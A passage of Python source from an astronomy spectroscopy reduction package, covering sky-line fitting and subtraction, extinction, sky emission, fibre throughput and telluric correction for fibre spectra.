6265.50,
6470.91,
6832.70,
6978.45,
7244.43,
7303.92,
7715.50,
7759.89,
7860.662,
7921.02,
7780.43,
7879.96,
8288.34,
8352.78,
9160.9,
9102.8,
9224.8,
8836.27,
8767.7,
0,
] # 8767.2, 0] #
say_status = 0
# plot=True
# verbose = True
# warnings = True
self.wavelength_offset_per_fibre = []
self.sky_auto_scale = []
if fibre != 0:
f_i = fibre
f_f = fibre + 1
print(" Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
plot = True
verbose = True
warnings = True
else:
f_i = 0
f_f = self.n_spectra
for fibre in range(f_i, f_f): # (self.n_spectra):
if fibre == say_status:
print(" Checking fibre {:4} ... ({:6.2f} % completed) ...".format(
fibre,
fibre * 100.0 / self.n_spectra
)
)
say_status = say_status + 20
# Gaussian fits to the sky spectrum
sl_gaussian_flux = []
sl_gaussian_sigma = []
sl_gauss_center = []
skip_sl_fit = [] # True emission line, False no emission line
j_lines = 0
el_low = el_low_list[j_lines]
el_high = el_high_list[j_lines]
sky_sl_gaussian_fitted = copy.deepcopy(sky)
di = 0
if verbose:
print("\n> Performing Gaussian fitting to sky lines in sky spectrum...")
for i in range(number_sl):
if sl_center[i] > el_high:
while sl_center[i] > el_high:
j_lines = j_lines + 1
if j_lines < len(el_low_list) - 1:
el_low = el_low_list[j_lines]
el_high = el_high_list[j_lines]
# print "Change to range ",el_low,el_high
else:
el_low = w[-1] + 1
el_high = w[-1] + 2
if sl_fnl[i] == 0:
plot_fit = False
else:
plot_fit = True
if sl_center[i] == dsky1[di]:
warnings_ = False
if sl_fnl[i] == 1:
warnings_ = True
if verbose:
print(" Line {} blended with {}".format(sl_center[i], dsky2[di]))
resultado = dfluxes(
w,
sky_sl_gaussian_fitted,
sl_center[i],
dsky2[di],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad1=2.1 * 2.355,
broad2=2.1 * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings_,
) # Broad is FWHM for Gaussian sigm a= 1,
di = di + 1
else:
resultado = fluxes(
w,
sky_sl_gaussian_fitted,
sl_center[i],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad=2.1 * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings,
) # Broad is FWHM for Gaussian sigm a= 1,
sl_gaussian_flux.append(resultado[3])
sky_sl_gaussian_fitted = resultado[11]
sl_gauss_center.append(resultado[1])
sl_gaussian_sigma.append(resultado[5] / 2.355)
if el_low < sl_center[i] < el_high:
if verbose:
print(" SKY line {} in EMISSION LINE !".format(sl_center[i]))
skip_sl_fit.append(True)
else:
skip_sl_fit.append(False)
# print " Fitted wavelength for sky line ",sl_center[i]," : ",resultado[1]," ",resultado[5]
if plot_fit:
if verbose:
print(" Fitted wavelength for sky line {} : {} sigma = {}".format(
sl_center[i], sl_gauss_center[i], sl_gaussian_sigma[i])
)
wmin = sl_lmin[i]
wmax = sl_lmax[i]
# Gaussian fit to object spectrum
object_sl_gaussian_flux = []
object_sl_gaussian_sigma = []
ratio_object_sky_sl_gaussian = []
dif_center_obj_sky = []
spec = spectra[fibre]
object_sl_gaussian_fitted = copy.deepcopy(spec)
object_sl_gaussian_center = []
di = 0
if verbose:
print("\n> Performing Gaussian fitting to sky lines in fibre {} of object data...".format(fibre))
for i in range(number_sl):
if sl_fnl[i] == 0:
plot_fit = False
else:
plot_fit = True
if skip_sl_fit[i]:
if verbose:
print(" SKIPPING SKY LINE {} as located within the range of an emission line!".format(
sl_center[i]))
object_sl_gaussian_flux.append(
float("nan")
) # The value of the SKY SPECTRUM
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
else:
if sl_center[i] == dsky1[di]:
warnings_ = False
if sl_fnl[i] == 1:
warnings_ = True
if verbose:
print(" Line {} blended with {}".format(sl_center[i], dsky2[di]))
resultado = dfluxes(
w,
object_sl_gaussian_fitted,
sl_center[i],
dsky2[di],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad1=sl_gaussian_sigma[i] * 2.355,
broad2=sl_gaussian_sigma[i] * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings_,
)
di = di + 1
if (
resultado[3] > 0
and resultado[5] / 2.355 < maxima_sigma
and resultado[13] > 0
and resultado[14] / 2.355 < maxima_sigma
): # and resultado[5] < maxima_sigma: # -100000.: #0:
use_sigma = resultado[5] / 2.355
object_sl_gaussian_flux.append(resultado[3])
object_sl_gaussian_fitted = resultado[11]
object_sl_gaussian_center.append(resultado[1])
object_sl_gaussian_sigma.append(use_sigma)
dif_center_obj_sky.append(
object_sl_gaussian_center[i] - sl_gauss_center[i]
)
else:
if verbose:
print(" Bad fit for {}! ignoring it...".format(sl_center[i]))
object_sl_gaussian_flux.append(float("nan"))
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
skip_sl_fit[i] = True # We don't substract this fit
else:
resultado = fluxes(
w,
object_sl_gaussian_fitted,
sl_center[i],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad=sl_gaussian_sigma[i] * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings,
) # Broad is FWHM for Gaussian sigma= 1,
# print sl_center[i],sl_gaussian_sigma[i], resultado[5]/2.355, maxima_sigma
if (
resultado[3] > 0 and resultado[5] / 2.355 < maxima_sigma
): # and resultado[5] < maxima_sigma: # -100000.: #0:
object_sl_gaussian_flux.append(resultado[3])
object_sl_gaussian_fitted = resultado[11]
object_sl_gaussian_center.append(resultado[1])
object_sl_gaussian_sigma.append(resultado[5] / 2.355)
dif_center_obj_sky.append(
object_sl_gaussian_center[i] - sl_gauss_center[i]
)
else:
if verbose:
print(" Bad fit for {}! ignoring it...".format(sl_center[i]))
object_sl_gaussian_flux.append(float("nan"))
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
skip_sl_fit[i] = True # We don't substract this fit
ratio_object_sky_sl_gaussian.append(
old_div(object_sl_gaussian_flux[i], sl_gaussian_flux[i])
) # TODO: to remove once sky_line_fitting is active and we can do 1Dfit
# Scale sky lines that are located in emission lines or provided negative values in fit
# reference_sl = 1 # Position in the file! Position 1 is sky line 6363.4
# sl_ref_ratio = sl_gaussian_flux/sl_gaussian_flux[reference_sl]
if verbose:
print("\n> Correcting skylines for which we couldn't get a Gaussian fit...\n")
for i in range(number_sl):
if skip_sl_fit[i] == True:
# Use known center, sigma of the sky and peak
gauss_fix = sl_gaussian_sigma[i]
small_center_correction = 0.0
# Check if center of previous sky line has a small difference in wavelength
small_center_correction = np.nanmedian(dif_center_obj_sky[0:i])
if verbose:
print("- Small correction of center wavelength of sky line {} : {}".format(
sl_center[i], small_center_correction))
object_sl_gaussian_fitted = substract_given_gaussian(
w,
object_sl_gaussian_fitted,
sl_center[i] + small_center_correction,
peak=0,
sigma=gauss_fix,
flux=0,
search_peak=True,
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
plot=False,
verbose=verbose,
)
# Substract second Gaussian if needed !!!!!
for di in range(len(dsky1) - 1):
if sl_center[i] == dsky1[di]:
if verbose:
print(" This was a double sky line, also substracting {} at {}".format(
dsky2[di], np.array(dsky2[di]) + small_center_correction))
object_sl_gaussian_fitted = substract_given_gaussian(
w,
object_sl_gaussian_fitted,
np.array(dsky2[di]) + small_center_correction,
peak=0,
sigma=gauss_fix,
flux=0,
search_peak=True,
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
plot=False,
verbose=verbose,
)
# wmin,wmax = 6100,6500
# ymin,ymax= -100,400
#
# wmin,wmax = 6350,6700
# wmin,wmax = 7100,7700
# wmin,wmax = 7600,8200
# wmin,wmax = 8200,8500
# wmin,wmax = 7350,7500
# wmin,wmax=6100, 8500 #7800, 8000#6820, 6850 #6700,7000 #6300,6450#7500
# wmin,wmax = 8700,9300
# ymax=800
if plot:
plt.figure(figsize=(11, 4))
plt.plot(w, spec, "y", alpha=0.7, label="Object")
plt.plot(
w,
object_sl_gaussian_fitted,
"k",
alpha=0.5,
label="Obj - sky fitted",
)
plt.plot(w, sky_sl_gaussian_fitted, "r", alpha=0.5, label="Sky fitted")
plt.plot(w, spec - sky, "g", alpha=0.5, label="Obj - sky")
plt.plot(
w,
object_sl_gaussian_fitted - sky_sl_gaussian_fitted,
"b",
alpha=0.9,
label="Obj - sky fitted - rest sky",
)
plt.xlim(wmin, wmax)
plt.ylim(ymin, ymax)
ptitle = "Fibre " + np.str(fibre) # +" with rms = "+np.str(rms[i])
plt.title(ptitle)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Flux [counts]")
plt.legend(frameon=True, loc=2, ncol=5)
plt.minorticks_on()
for i in range(len(el_list)):
plt.axvline(x=el_list[i], color="k", linestyle="--", alpha=0.5)
for i in range(number_sl):
if sl_fnl[i] == 1:
plt.axvline(
x=sl_center[i], color="brown", linestyle="-", alpha=1
)
else:
plt.axvline(
x=sl_center[i], color="y", linestyle="--", alpha=0.6
)
for i in range(len(dsky2) - 1):
plt.axvline(x=dsky2[i], color="orange", linestyle="--", alpha=0.6)
# plt.show()
# plt.close()
offset = np.nanmedian(
np.array(object_sl_gaussian_center) - np.array(sl_gauss_center)
)
if verbose:
# reference_sl = 1 # Position in the file!
# sl_ref_ratio = sl_gaussian_flux/sl_gaussian_flux[reference_sl]
# print "\n n line fsky fspec fspec/fsky l_obj-l_sky fsky/6363.4 sigma_sky sigma_fspec"
# #print "\n n c_object c_sky c_obj-c_sky"
# for i in range(number_sl):
# if skip_sl_fit[i] == False: print "{:2} {:6.1f} {:8.2f} {:8.2f} {:7.4f} {:5.2f} {:6.3f} {:6.3f} {:6.3f}" .format(i+1,sl_center[i],sl_gaussian_flux[i],object_sl_gaussian_flux[i],ratio_object_sky_sl_gaussian[i],object_sl_gaussian_center[i]-sl_gauss_center[i],sl_ref_ratio[i],sl_gaussian_sigma[i],object_sl_gaussian_sigma[i])
# #if skip_sl_fit[i] == False: print "{:2} {:9.3f} {:9.3f} {:9.3f}".format(i+1, object_sl_gaussian_center[i], sl_gauss_center[i], dif_center_obj_sky[i])
#
print("\n> Median center offset between OBJ and SKY : {} A\n> Median gauss for the OBJECT {} A".format(offset, np.nanmedian(object_sl_gaussian_sigma)))
print("> Median flux OBJECT / SKY = {}".format(np.nanmedian(ratio_object_sky_sl_gaussian)))
self.wavelength_offset_per_fibre.append(offset)
# plt.plot(object_sl_gaussian_center, ratio_object_sky_sl_gaussian, "r+")
if auto_scale_sky:
if verbose:
print("\n> As requested, using this value to scale sky spectrum before substraction... ")
auto_scale = np.nanmedian(ratio_object_sky_sl_gaussian)
self.sky_auto_scale.append(np.nanmedian(ratio_object_sky_sl_gaussian))
# self.sky_emission = auto_scale * self.sky_emission
else:
auto_scale = 1.0
self.sky_auto_scale.append(1.0)
if rebin:
if verbose:
print("\n> Rebinning the spectrum of fibre {} to match sky spectrum...".format(fibre))
f = object_sl_gaussian_fitted
f_new = rebin_spec_shift(w, f, offset)
else:
f_new = object_sl_gaussian_fitted
self.intensity_corrected[fibre] = (
f_new - auto_scale * sky_sl_gaussian_fitted
)
# check offset center wavelength
# good_sl_center=[]
# good_sl_center_dif=[]
# plt.figure(figsize=(14, 4))
# for i in range(number_sl):
# if skip_sl_fit[i] == False:
# plt.plot(sl_center[i],dif_center_obj_sky[i],"g+", alpha=0.7, label="Object")
# good_sl_center.append(sl_center[i])
# good_sl_center_dif.append(dif_center_obj_sky[i])
#
# a1x,a0x = np.polyfit(good_sl_center, good_sl_center_dif, 1)
# fx = a0x + a1x*w
# #print a0x, a1x
# offset = np.nanmedian(good_sl_center_dif)
# print "median =",offset
# plt.plot(w,fx,"b", alpha=0.7, label="Fit")
# plt.axhline(y=offset, color='r', linestyle='--')
# plt.xlim(6100,9300)
# #plt.ylim(ymin,ymax)
# ptitle = "Fibre "+np.str(fibre)#+" with rms = "+np.str(rms[i])
# plt.title(ptitle)
# plt.xlabel("Wavelength [$\AA$]")
# plt.ylabel("c_obj - c_sky")
# #plt.legend(frameon=True, loc=2, ncol=4)
# plt.minorticks_on()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def do_extinction_curve(
self, observatory_file=pth.join(DATA_PATH, "ssoextinct.dat"), plot=True
):
"""
Parameters
----------
observatory_file
plot
Returns
-------
"""
print("\n> Computing extinction at given airmass...")
# Read data
data_observatory = np.loadtxt(observatory_file, unpack=True)
extinction_curve_wavelengths = data_observatory[0]
extinction_curve = data_observatory[1]
extinction_corrected_airmass = 10 ** (0.4 * self.airmass * extinction_curve)
# Make fit
tck = interpolate.splrep(
extinction_curve_wavelengths, extinction_corrected_airmass, s=0
)
self.extinction_correction = interpolate.splev(self.wavelength, tck, der=0)
# Plot
if plot:
plt.figure(figsize=(10, 5))
plt.plot(extinction_curve_wavelengths, extinction_corrected_airmass, "+")
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
cinco_por_ciento = 0.05 * (
np.max(self.extinction_correction) - np.min(self.extinction_correction)
)
plt.ylim(
np.min(self.extinction_correction) - cinco_por_ciento,
np.max(self.extinction_correction) + cinco_por_ciento,
)
plt.plot(self.wavelength, self.extinction_correction, "g")
plt.minorticks_on()
plt.title("Correction for extinction using airmass = {}".format(self.airmass))
plt.ylabel("Flux correction")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
# Correct for extinction at given airmass
print(" Airmass = {}".format(self.airmass))
print(" Observatory file with extinction curve : {}".format(observatory_file))
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] * self.extinction_correction
)
print(" Intensities corrected for extinction stored in self.intensity_corrected !")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def find_sky_emission(
self,
intensidad=[0, 0],
plot=True,
n_sky=200,
sky_fibres=[1000],
sky_wave_min=0,
sky_wave_max=0,
norm=colors.LogNorm(),
):
"""
Parameters
----------
intensidad
plot
n_sky
sky_fibres
sky_wave_min
sky_wave_max
norm
Returns
-------
"""
if sky_wave_min == 0:
sky_wave_min = self.valid_wave_min
if sky_wave_max == 0:
sky_wave_max = self.valid_wave_max
if np.nanmedian(intensidad) == 0:
intensidad = self.intensity_corrected
ic = 1
else:
ic = 0
if sky_fibres[0] == 1000: # As it was original
# sorted_by_flux = np.argsort(flux_ratio) ORIGINAL till 21 Jan 2019
# NEW 21 Jan 2019: Assuming cleaning of cosmics and CCD defects, we just use the spaxels with the LOWEST INTEGRATED VALUES
self.compute_integrated_fibre(
valid_wave_min=sky_wave_min, valid_wave_max=sky_wave_max, plot=False
)
sorted_by_flux = np.argsort(
self.integrated_fibre
) # (self.integrated_fibre)
print("\n> Identifying sky spaxels using the lowest integrated values in the [ {} , {}] range ...".format(sky_wave_min, sky_wave_max))
# if plot:
# # print "\n Plotting fluxes and flux ratio: "
# plt.figure(figsize=(10, 4))
# plt.plot(flux_ratio[sorted_by_flux], 'r-', label='flux ratio')
# plt.plot(flux_sky[sorted_by_flux], 'c-', label='flux sky')
# plt.plot(flux_object[sorted_by_flux], 'k-', label='flux object')
# plt.axvline(x=n_sky)
# plt.xlabel("Spaxel")
# plt.ylabel("Flux")
# plt.yscale('log')
# plt.legend(frameon=False, loc=4)
# plt.show()
# Angel routine: just take n lowest spaxels!
optimal_n = n_sky
print(" We use the lowest {} fibres for getting sky. Their positions are:".format(optimal_n))
# Compute sky spectrum and plot it
self.sky_fibres = sorted_by_flux[:optimal_n]
self.sky_emission = np.nanmedian(
intensidad[sorted_by_flux[:optimal_n]], axis=0
)
print(" List of fibres used for sky saved in self.sky_fibres")
else: # We provide a list with sky positions
print(" We use the list provided to get the sky spectrum")
print(" sky_fibres = {}".format(sky_fibres))
self.sky_fibres = np.array(sky_fibres)
self.sky_emission = np.nanmedian(intensidad[self.sky_fibres], axis=0)
if plot:
self.RSS_map(
self.integrated_fibre, None, self.sky_fibres, title=" - Sky Spaxels"
) # flux_ratio
# print " Combined sky spectrum:"
plt.figure(figsize=(10, 4))
plt.plot(self.wavelength, self.sky_emission, "c-", label="sky")
plt.yscale("log")
plt.ylabel("FLux")
plt.xlabel("Wavelength [$\AA$]")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.ylim([np.nanmin(intensidad), np.nanmax(intensidad)])
plt.minorticks_on()
plt.title("{} - Combined Sky Spectrum".format(self.description))
plt.legend(frameon=False)
# plt.show()
# plt.close()
# Substract sky in all intensities
self.intensity_sky_corrected = np.zeros_like(self.intensity)
for i in range(self.n_spectra):
if ic == 1:
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] - self.sky_emission
)
if ic == 0:
self.intensity_sky_corrected[i, :] = (
self.intensity_corrected[i, :] - self.sky_emission
)
last_sky_fibre = self.sky_fibres[-1]
# Plot median value of fibre vs. fibre
if plot:
median_sky_corrected = np.zeros(self.n_spectra)
for i in range(self.n_spectra):
if ic == 1:
median_sky_corrected[i] = np.nanmedian(
self.intensity_corrected[i, :], axis=0
)
if ic == 0:
median_sky_corrected[i] = np.nanmedian(
self.intensity_sky_corrected[i, :], axis=0
)
plt.figure(figsize=(10, 4))
plt.plot(median_sky_corrected)
plt.plot(
[0, 1000],
[
median_sky_corrected[last_sky_fibre],
median_sky_corrected[last_sky_fibre],
],
"r",
)
plt.minorticks_on()
plt.ylabel("Median Flux")
plt.xlabel("Fibre")
plt.yscale("log")
plt.ylim([np.nanmin(median_sky_corrected), np.nanmax(median_sky_corrected)])
plt.title(self.description)
plt.legend(frameon=False)
# plt.show()
# plt.close()
print(" Sky spectrum obtained and stored in self.sky_emission !! ")
print(" Intensities corrected for sky emission and stored in self.intensity_corrected !")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def find_relative_throughput(
self,
ymin=10000,
ymax=200000, # nskyflat=False,
kernel_sky_spectrum=5,
wave_min_scale=0,
wave_max_scale=0,
plot=True,
):
"""
Determine the relative transmission of each spectrum
using a skyflat.
Parameters
----------
ymin
ymax
kernel_sky_spectrum
wave_min_scale
wave_max_scale
plot
Returns
-------
"""
# These are for the normalized flat:
# fit_skyflat_degree=0, step=50, wave_min_flat=0, wave_max_flat=0):
print("\n> Using this skyflat to find relative throughput (a scale per fibre)...")
# Check grating to chose wavelength range to get median values
if wave_min_scale == 0 and wave_max_scale == 0:
if self.grating == "1000R":
wave_min_scale = 6600.0
wave_max_scale = 6800.0
print(" For 1000R, we use the median value in the [6600, 6800] range.")
if self.grating == "1500V":
wave_min_scale = 5100.0
wave_max_scale = 5300.0
print(" For 1500V, we use the median value in the [5100, 5300] range.")
if self.grating == "580V":
wave_min_scale = 4700.0
wave_max_scale = 4800.0
print(" For 580V, we use the median value in the [4700, 4800] range.")
if self.grating == "385R":
wave_min_scale = 6600.0
wave_max_scale = 6800.0
print(" For 385R, we use the median value in the [6600, 6800] range.")
# print(" For {}, we use the median value in the [{}, {}] range.".format(
# self.grating, wave_min_scale, wave_max_scale))
else:
if wave_min_scale == 0:
wave_min_scale = self.wavelength[0]
if wave_max_scale == 0:
wave_max_scale = self.wavelength[-1]
print(" As given by the user, we use the median value in the [{} , {}] range.".format(wave_min_scale, wave_max_scale))
median_region = np.zeros(self.n_spectra)
for i in range(self.n_spectra):
region = np.where(
(self.wavelength > wave_min_scale) & (self.wavelength < wave_max_scale)
)
median_region[i] = np.nanmedian(self.intensity[i, region])
median_value_skyflat = np.nanmedian(median_region)
self.relative_throughput = median_region/median_value_skyflat
print(" Median value of skyflat in the [ {} , {}] range = {}".format(wave_min_scale, wave_max_scale, median_value_skyflat))
print(" Individual fibre corrections: min = {} max = {}".format(np.nanmin(self.relative_throughput), np.nanmax(self.relative_throughput)))
if plot:
plt.figure(figsize=(10, 4))
x = list(range(self.n_spectra))
plt.plot(x, self.relative_throughput)
# plt.ylim(0.5,4)
plt.minorticks_on()
plt.xlabel("Fibre")
plt.ylabel("Throughput using scale")
plt.title("Throughput correction using scale")
# plt.show()
# plt.close()
# print "\n Plotting spectra WITHOUT considering throughput correction..."
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
plt.plot(self.wavelength, self.intensity[i, ])
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra WITHOUT considering any throughput correction")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(ymin, ymax)
plt.minorticks_on()
# plt.show()
# plt.close()
# print " Plotting spectra CONSIDERING throughput correction..."
plt.figure(figsize=(10, 4))
for i in range(self.n_spectra):
# self.intensity_corrected[i,] = self.intensity[i,] * self.relative_throughput[i]
plot_this = self.intensity[i, ]/self.relative_throughput[i]
plt.plot(self.wavelength, plot_this)
plt.ylim(ymin, ymax)
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.title("Spectra CONSIDERING throughput correction (scale)")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=wave_min_scale, color="k", linestyle="--")
plt.axvline(x=wave_max_scale, color="k", linestyle="--")
# plt.show()
# plt.close()
print("\n> Using median value of skyflat considering a median filter of {} ...".format(kernel_sky_spectrum)) # LUKE
median_sky_spectrum = np.nanmedian(self.intensity, axis=0)
self.response_sky_spectrum = np.zeros_like(self.intensity)
rms = np.zeros(self.n_spectra)
plot_fibres = [100, 500, 501, 900]
pf = 0
for i in range(self.n_spectra):
self.response_sky_spectrum[i] = (
(self.intensity[i]/self.relative_throughput[i])/median_sky_spectrum
)
filter_response_sky_spectrum = sig.medfilt(
self.response_sky_spectrum[i], kernel_size=kernel_sky_spectrum
)
rms[i] = np.nansum(
np.abs(self.response_sky_spectrum[i] - filter_response_sky_spectrum)
)/np.nansum(self.response_sky_spectrum[i])
if plot:
if i == plot_fibres[pf]:
plt.figure(figsize=(10, 4))
plt.plot(
self.wavelength,
self.response_sky_spectrum[i],
alpha=0.3,
label="Response Sky",
)
plt.plot(
self.wavelength,
filter_response_sky_spectrum,
alpha=0.7,
linestyle="--",
label="Filtered Response Sky",
)
plt.plot(
self.wavelength,
self.response_sky_spectrum[i]/filter_response_sky_spectrum,
alpha=1,
label="Normalized Skyflat",
)
plt.xlim(self.wavelength[0] - 50, self.wavelength[-1] + 50)
plt.ylim(0.95, 1.05)
ptitle = "Fibre {} with rms = {}".format(i, rms[i])
plt.title(ptitle)
plt.xlabel("Wavelength [$\AA$]")
plt.legend(frameon=False, loc=3, ncol=1)
# plt.show()
# plt.close()
if pf < len(plot_fibres) - 1:
pf = pf + 1
print(" median rms = {} min rms = {} max rms = {}".format(np.nanmedian(rms), np.nanmin(rms),np.nanmax(rms)))
# if plot:
# plt.figure(figsize=(10, 4))
# for i in range(self.n_spectra):
# #plt.plot(self.wavelength,self.intensity[i,]/median_sky_spectrum)
# plot_this = self.intensity[i,] / self.relative_throughput[i] /median_sky_spectrum
# plt.plot(self.wavelength, plot_this)
# plt.xlabel("Wavelength [$\AA$]")
# plt.title("Spectra CONSIDERING throughput correction (scale) / median sky spectrum")
# plt.xlim(self.wavelength[0]-10,self.wavelength[-1]+10)
# plt.ylim(0.7,1.3)
# plt.minorticks_on()
# plt.show()
# plt.close()
#
# plt.plot(self.wavelength, median_sky_spectrum, color='r',alpha=0.7)
# plt.plot(self.wavelength, filter_median_sky_spectrum, color='blue',alpha=0.7)
# plt.show()
# plt.close()
#
# plt.plot(self.wavelength, median_sky_spectrum/filter_median_sky_spectrum, color='r',alpha=0.7)
# plt.show()
# plt.close()
# for i in range(2):
# response_sky_spectrum_ = self.intensity[500+i,] / self.relative_throughput[500+i] /median_sky_spectrum
# filter_response_sky_spectrum = sig.medfilt(response_sky_spectrum_,kernel_size=kernel_sky_spectrum)
# rms=np.nansum(np.abs(response_sky_spectrum_ - filter_response_sky_spectrum))/np.nansum(response_sky_spectrum_)
# for i in range(5):
# filter_response_sky_spectrum_ = (self.intensity[500+i,] / self.relative_throughput[500+i] ) / median_sky_spectrum
# filter_response_sky_spectrum = sig.medfilt(filter_response_sky_spectrum_,kernel_size=kernel_sky_spectrum)
#
# plt.plot(self.wavelength, filter_response_sky_spectrum,alpha=0.7)
# plt.ylim(0.95,1.05)
# plt.show()
# plt.close()
print("\n> Relative throughput using skyflat scaled stored in self.relative_throughput !!")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def get_telluric_correction(
self,
n_fibres=10,
correct_from=6850.0,
correct_to=10000.0,
apply_tc=False,
step=10,
combined_cube=False,
weight_fit_median=0.5,
exclude_wlm=[
[6450, 6700],
[6850, 7050],
[7130, 7380],
], # This is range for 1000R
wave_min=0,
wave_max=0,
plot=True,
fig_size=12,
verbose=False,
):
""" # TODO BLAKE: always use false, use plots to make sure it's good. prob just save as a different file.
Get telluric correction using a spectrophotometric star
Parameters
----------
n_fibres: integer
number of fibers to add for obtaining spectrum
correct_from : float
wavelength from which telluric correction is applied (default = 6850)
apply_tc : boolean (default = False)
apply telluric correction to data
exclude_wlm=[[6450,6700],[6850,7050], [7130,7380]]:
Wavelength ranges not considering for normalising stellar continuum
Example
----------
telluric_correction_star1 = star1r.get_telluric_correction(n_fibres=15)
"""
print("\n> Obtaining telluric correction using spectrophotometric star...")
if combined_cube:
wlm = self.combined_cube.wavelength
else:
wlm = self.wavelength
if wave_min == 0:
wave_min = wlm[0]
if wave_max == 0:
wave_max = wlm[-1]
if combined_cube:
if self.combined_cube.seeing == 0:
self.combined_cube.half_light_spectrum(
5, plot=plot, min_wave=wave_min, max_wave=wave_max
)
estrella = self.combined_cube.integrated_star_flux
else:
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
intensidad = self.intensity_corrected
region = []
for fibre in range(n_fibres):
region.append(integrated_intensity_sorted[-1 - fibre])
estrella = np.nansum(intensidad[region], axis=0)
smooth_med_star = smooth_spectrum(
wlm,
estrella,
wave_min=wave_min,
wave_max=wave_max,
step=step,
weight_fit_median=weight_fit_median,
exclude_wlm=exclude_wlm,
plot=plot,
verbose=verbose,
)
telluric_correction = np.ones(len(wlm))
for l in range(len(wlm)):
if wlm[l] > correct_from and wlm[l] < correct_to:
telluric_correction[l] = smooth_med_star[l]/estrella[l] # TODO: should be float, check when have star data
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
if combined_cube:
print(" Telluric correction for this star ({}) :".format(self.combined_cube.object))
plt.plot(wlm, estrella, color="b", alpha=0.3)
plt.plot(wlm, estrella * telluric_correction, color="g", alpha=0.5)
plt.ylim(np.nanmin(estrella), np.nanmax(estrella))
else:
print(" Example of telluric correction using fibres {} and {} :".format(region[0], region[1]))
plt.plot(wlm, intensidad[region[0]], color="b", alpha=0.3)
plt.plot(
wlm,
intensidad[region[0]] * telluric_correction,
color="g",
alpha=0.5,
)
plt.plot(wlm, intensidad[region[1]], color="b", alpha=0.3)
plt.plot(
wlm,
intensidad[region[1]] * telluric_correction,
color="g",
alpha=0.5,
)
plt.ylim(
np.nanmin(intensidad[region[1]]), np.nanmax(intensidad[region[0]])
) # CHECK THIS AUTOMATICALLY
plt.axvline(x=wave_min, color="k", linestyle="--")
plt.axvline(x=wave_max, color="k", linestyle="--")
plt.xlim(wlm[0] - 10, wlm[-1] + 10)
plt.xlabel("Wavelength [$\AA$]")
if exclude_wlm[0][0] != 0:
for i in range(len(exclude_wlm)):
plt.axvspan(
exclude_wlm[i][0], exclude_wlm[i][1], color="r", alpha=0.1
)
plt.minorticks_on()
# plt.show()
# plt.close()
if apply_tc: # Check this
print(" Applying telluric correction to this star...")
if combined_cube:
self.combined_cube.integrated_star_flux = (
self.combined_cube.integrated_star_flux * telluric_correction
)
for i in range(self.combined_cube.n_rows):
for j in range(self.combined_cube.n_cols):
self.combined_cube.data[:, i, j] = (
self.combined_cube.data[:, i, j] * telluric_correction
)
else:
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] * telluric_correction
)
return telluric_correction
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_spectrum(self, spectrum_number, sky=True, xmin=0, xmax=0, ymax=0, ymin=0):
"""
Plot spectrum of a particular spaxel.
Parameters
----------
spectrum_number:
spaxel to show spectrum.
sky:
if True substracts the sky
Example
-------
>>> rss1.plot_spectrum(550, sky=True)
"""
if sky:
spectrum = self.intensity_corrected[spectrum_number]
else:
spectrum = self.intensity_corrected[spectrum_number] + self.sky_emission
plt.plot(self.wavelength, spectrum)
# error = 3*np.sqrt(self.variance[spectrum_number])
# plt.fill_between(self.wavelength, spectrum-error, spectrum+error, alpha=.1)
if xmin != 0 or xmax != 0 or ymax != 0 or ymin != 0:
